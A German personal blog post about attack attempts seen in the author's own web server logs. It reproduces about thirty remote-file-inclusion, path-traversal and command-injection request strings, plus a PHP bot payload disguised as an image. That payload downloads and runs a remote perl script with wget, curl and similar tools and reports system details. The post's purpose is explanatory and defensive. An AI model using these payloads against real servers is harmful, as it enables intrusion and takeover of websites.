Ich nutze WordPress nicht Joomla

Wie der Titel es schon sagt, ich benutze WordPress und nicht Joomla. Vermutlich müsste ich dies auf Englisch schreiben, damit es auch die hinterletzten „Personen“ lesen und verstehen können.

Aber nun dämmert es mir, das sind ja Scripte und die können nicht lesen.

Das Joomla eines der unsichersten CMS Systemen ist, habe ich schon Sicherheit von Open CMS Systemen (Joomla Bugs), wo ich die veröffentlichten Bugs von 10 Tagen präsentierte.

27 Sicherheitslücken war das Resümee. Leider waren dies keine speziellen 10 Tage, sondern Tagesgeschäft bei Joomla.

Immer wieder fällt mir auf, wie versucht wird mein netter Blog anzugreifen. In dem Log bleiben selbstverständlich die Spuren zurück, wie:

/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path=http://*****/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??

Einfach mal aus Lust und Laune schaute ich den letzten Monat an und machte eine Liste wobei pro Angreifer nur 1 Zeile aufgenommen wurde.

configdir=%7Cecho%20%22Osirys-p0wa%22;%20id%7C
libpath=http://****/idbrac.txt???
_PHPLIB[libdir]=http://****/README.txt??
board_skin_path=http://****g/images/log.png???
thisdir=http://****/steelbahamas/id1.txt??
_SERVER[DOCUMENT_ROOT]=http://****/forum/Smileys/id1.txt??
include_path=http://****/upfiles/README.txt?
forumspath=http://****/A51/id.txt????
name=../../../../../../../../../../../../../proc/self/environ%00
myPath=http://****/content/id.txt??
cm_ext_server=http://****//news//inc/id1.txt???
r=http://****/list/respon1.txt?
_SERVER[DOCUMENT_ROOT]=http://****//shop/data/log/id.txt??
r=http://****//1.txt???
c=../../../../../../../../../../../../../etc/passwd%00
myPath=http://****/media/id.txt???
fs_javascript=http://****//administrator/components/com_virtuemart/sql/Oid1.txt???
basePath=http://****/images/r8_c11.gif???
show=../../../../../../../../../../../../../proc/self/environ%00
board_skin_path=http://****/test.txt??
wpPATH=http://****/list/id1.txt??
path_to_root=http://****/fx29id1.txt?????
mosConfig_absolute_path=http://****/extend/respon1.txt??
mosConfig.absolute.path=http://****//email-images/images/test.txt????
mosConfig_absolute_path=http://****/bbs//skin/zero_vote/fx29id1.txt????
mosConfig_absolute_path=http://****/zfxid1.txt???
mosConfig_absolute_path=http://****/lct/exam3/111/id1.txt???
mosConfig_absolute_path=http://****/idf.txt??
mosConfig_absolute_path=http://****/fx29id1.txt?
mosConfig_absolute_path=http://****/bbs//data/1.txt????
mosConfig_absolute_path=http://****/thumbnails/id1.txt?
mosConfig_absolute_path=http://****/bbs/README.txt?
q=http://****/language/byz9991.txt???
wpPATH=http://****/info.txt???

In den Files (z.B. http://****g/images/log.png) sind dann Dinge wie:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          
shell_exec('cd /tmp; wget http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;curl -O http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;lwp-download http://****/awerac/b.txt;perl b.txt;rm -rf b.txtt*');
shell_exec('cd /tmp;lynx -source http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;fetch http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;GET http://****/awerac/b.txt>b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;rm -rf b.txt*');
/* Das Ganze oben wiederholt sich dann mit verschiedenen Systembefehlen */

echo "DEPP NAMEN<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

In den TXT files ist meist sowas drin:

<?php /* ZFxID */ echo("Depp"."Name"); echo("Depp"."Name");  /* ZFxID */ ?>

Dies wird nur gemacht, um zu prüfen ob diese Werte ausgegeben werden, wenn Ja, dann ist der Code angreifbar und dann kommt man mit dem richtigen Exploit, wie im oberen Beispiel.

Naja, Kiddies ein kleiner Tipp, verwendet eine neue Sicherheitslücke, denn die wo ihr nutzt, ist schon ein wenig älter und schon fast überall behoben.

Die infizierten Webseiten (wo noch online sind) habe ich informiert.
Kontrolliert ich auch gelegentlich ob ihr angegriffen werdet? Wie oft passiert dies bei Euch?

About Stefan

Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

WordPress Domain Suchen und ersetzen

Es gibt diverse Plugins für WordPress, welche die Datenbank durchsuchen und Domain Vorkommnisse ersetzen. Doch was, wenn das WordPress bereits nicht mehr aufrufbar ist, da eine Umstellung schief ging? Dazu sind Plugins nicht brauchbar. Aus diesem Grund stelle ich meine Domains, mit einem kleinen PHP Skript um, was ich hier vorstelle. Das Skript durchsucht nicht die komplette Datenbank, was viel zu aufwändig ist, sondern Sucht …

Anti-Adblocker blockieren

Das Internet ist voll mit Werbung, dazu installiert man ein Adblocker. Viele Seiten gehen mit …

Ein Kommentar

  1. *kicher* als ich mal ne Weile meine 404 Seiten näher angesehen habe, kam mir auch als erstes die Frage, für welche Systeme die mich alles halten. Ein Shopsystem war übrigens auch dabei ;-)
    .-= Tanja´s last blog ..Volksnotebook 2010 – Dell Inspiron 15 für 449 Euro – Im Vergleich mit Acer Extensa 5635z und ASUS X5DIJ-SX247V =-.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.